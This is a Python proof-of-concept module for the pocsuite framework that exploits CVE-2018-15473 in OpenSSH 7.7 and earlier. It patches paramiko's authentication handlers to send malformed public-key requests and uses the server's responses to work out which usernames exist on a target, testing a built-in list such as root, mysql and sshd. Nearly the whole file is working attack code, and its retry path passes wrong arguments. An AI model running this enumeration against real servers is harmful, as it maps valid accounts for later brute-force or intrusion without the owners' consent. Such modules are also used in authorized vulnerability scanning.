#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import paramiko
import socket
import string
from random import randint as rand
from random import choice as choice

old_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
class BadUsername(Exception):
    def __init__(self):
        pass
# create malicious "add_boolean" function to malform packet
def add_boolean(*args, **kwargs):
    pass

# create function to call when username was invalid
def call_error(*args, **kwargs):
    raise BadUsername()

# create the malicious function to overwrite MSG_SERVICE_ACCEPT handler
def malform_packet(*args, **kwargs):
    old_add_boolean = paramiko.message.Message.add_boolean
    paramiko.message.Message.add_boolean = add_boolean
    result  = old_parse_service_accept(*args, **kwargs)
    #return old add_boolean function so start_client will work again
    paramiko.message.Message.add_boolean = old_add_boolean
    return result
class openssh():
    def __init__(self,hostname,port):
        self.random_username_list = []
        # populate the list
        for i in range(3):
            user = "".join(choice(string.ascii_lowercase) for x in range(rand(15, 20)))
            self.random_username_list.append(user)
        paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet
        paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error
        # self.arg_parser = argparse.ArgumentParser()
        # self.args = self.arg_parser.parse_args()
        self.hostname = hostname
        self.port = int(port)
        # self.args.username = username
        self.userList=["root","example","nobody","mail","sshd","mysql"]

    # function to test target system using the randomly generated usernames
    def checkVulnerable(self):
        vulnerable = True
        for user in self.random_username_list:
            result = self.checkUsername(self.hostname,self.port,user)
            if result[1]:
                vulnerable = False
        return vulnerable

    def checkUserlist(self,username_list):
        results=[]
        for user in username_list:
            result = self.checkUsername(self.hostname,self.port,user)
            if result[1]:
                results.append(result[0])
        return results

    def checkUsername(self,hostname,port,username, tried=0):
        sock = socket.socket()
        sock.connect((hostname, int(port)))
        # instantiate transport
        transport = paramiko.transport.Transport(sock)
        try:
            transport.start_client()
        except paramiko.ssh_exception.SSHException:
            # server was likely flooded, retry up to 3 times
            transport.close()
            if tried < 4:
                tried += 1
                return self.checkUsername(username, tried)
            else:
                print('[-] Failed to negotiate SSH transport')
        try:
            transport.auth_publickey(username, paramiko.RSAKey.generate(1024))
        except BadUsername:
                return (username, False)
        except paramiko.ssh_exception.AuthenticationException:
                return (username, True)
        raise Exception("There was an error. Is this the correct version of OpenSSH?")

    def run(self):
        sock = socket.socket()
        try:
            sock.connect((self.hostname, self.port))
            sock.close()
        except socket.error:
            return False
        else:
            if not self.checkVulnerable():
                return False
            elif self.userList:
                results=self.checkUserlist(self.userList)
                return results
            else:  # no usernames passed in
                return False

def poc(url):
    if url.startswith("http://"):
        url = url.strip("http://")
    if url.endswith("/"):
        url = url.strip("/")
    if ":" in url:
        url = url.split(":")
        ip = url[0]
        port = url[1]
        response = openssh(ip, port).run()
        return response
    else:
        ip=url
        response = openssh(ip, "22").run()
        return response
class TestPOC(POCBase):
    name = 'openssh_username_enumeration_CVE-2018-15473'
    vulID = 'CVE-2018-15473'
    author = ['sxd']
    vulType = 'username_enumeration'
    version = '1.0'  # default version: 1.0
    references = ['https://www.anquanke.com/post/id/157607']
    desc = '''
		   通过向OpenSSH服务器发送一个错误格式的公钥认证请求，可以判断是否存在特定的用户名。
		   如果用户名不存在，那么服务器会发给客户端一个验证失败的消息。
		   如果用户名存在，那么将因为解析失败，不返回任何信息，直接中断通讯。
		   '''
    vulDate = '2020-03-07'
    createDate = '2020-03-07'
    updateDate = '2020-03-07'
    appName = 'openssh'
    appVersion = 'OpenSSH <= 7.7'
    appPowerLink = ''
    samples = ['paramiko','socket','argparse']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + 'openssh_username_enumeration_CVE-2018-15473' + ' is exist!'
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = response
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
